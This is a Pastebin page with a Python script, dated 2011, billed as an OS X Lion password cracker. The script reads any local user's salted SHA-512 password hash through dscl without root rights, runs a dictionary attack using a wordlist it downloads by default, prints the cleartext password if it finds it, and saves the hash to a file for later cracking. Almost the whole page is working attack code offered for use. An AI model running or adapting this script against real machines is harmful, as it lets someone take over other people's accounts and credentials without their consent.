Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

OS X Lion Password Cracker

By: defenceindepth on Sep 18th, 2011  |  syntax: Python  |  size: 2.89 KB  |  views: 22,749  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. ##########################################
  2. #* OS X Lion 10.7 Password Cracker
  3. #* UID 0 NOT required
  4. #*
  5. #* Usage:
  6. #* python lion_crack.py [username] [dictionary]
  7. #*
  8. #*
  9. #* Patrick Dunstan
  10. #* Sep 18, 2011
  11. #* http://www.defenceindepth.net
  12. #*
  13. ###########################################
  14. from subprocess import *
  15. import hashlib
  16. import os
  17. import urllib2
  18. import sys
  19. from string import *
  20.  
  21. link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
  22. defaultuser = False
  23. username = ""
  24.  
  25. def check(password): # Hash password and compare
  26.                
  27.         if not password.startswith("#!"): # Ignore comments
  28.  
  29.                 guess = hashlib.sha512(salt_hex + password).hexdigest()
  30.                 print("Trying... " + password)
  31.        
  32.                 if guess == hash:
  33.                         print("Cleartext password for user '"+username+"' is : "+password)
  34.                         exit(0)
  35.  
  36. if len(sys.argv) < 2:
  37.         print("No username given. Defaulting to current user.")
  38.         defaultuser = True
  39. else:
  40.         username = sys.argv[1]
  41.  
  42. p = Popen("whoami", shell=True, stdout=PIPE)
  43. whoami = p.communicate()[0]
  44.  
  45. if defaultuser:
  46.         username = whoami.rstrip()
  47.  
  48. p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)
  49. dscl_out = p.communicate()[0]
  50.  
  51. list = dscl_out.split("\n")
  52.  
  53. for pos,item in enumerate(list): # extract digest
  54.         if "dsAttrTypeNative:ShadowHashData" in item:
  55.                 digest = list[pos+1].replace(" ", "")
  56.  
  57. if len(digest) == 262: # Out of box configuration      
  58.         salt = digest[56:64]   
  59.         hash = digest[64:192]
  60. elif len(digest) == 314: # SMB turned on
  61.         print("SMB is on")
  62.         salt = digest[104:112]
  63.         hash = digest[112:240]
  64. elif len(digest) == 1436: # Lion Server
  65.         salt = digest[176:184]
  66.         hash = digest[176:304]
  67. elif len(digest) == 1492: # Lion Server with SMB
  68.         salt = digest[224:232]
  69.         hash = digest[232:360]
  70.  
  71. print("SALT : " + salt)
  72. print("HASH : " + hash)
  73.  
  74. salt_hex =  chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16))
  75.  
  76. if len(sys.argv) == 3: # If dictionary file specified
  77.         print("Reading from dictionary file '"+sys.argv[2]+"'.")
  78.         check(whoami.rstrip())
  79.         passlist = open(sys.argv[2], "r")
  80.         password = passlist.readline()
  81.  
  82.         while password:
  83.                 check(password.rstrip())
  84.                 password = passlist.readline()
  85.         passlist.close()
  86.  
  87. else: # No dictionary file specified
  88.         print("No dictionary file specified. Defaulting to hard coded link.")
  89.        
  90.         passlist = urllib2.urlopen(link) # Download dictionary file
  91.         passwords = passlist.read().split("\n")
  92.         print("\nPassword list successfully read")
  93.        
  94.         passwords.append(whoami.rstrip())      
  95.        
  96.         print("\nCracking...")
  97.         for password in passwords:
  98.                 check(password)
  99.  
  100. # Save hash for later
  101. print("\nSaving hash to "+username+".hash...")
  102. out = open(username+".hash", "w")
  103. out.write(salt+hash)
  104. out.close()
  105.  
  106. print("\nPassword not found. Try another dictionary.\n")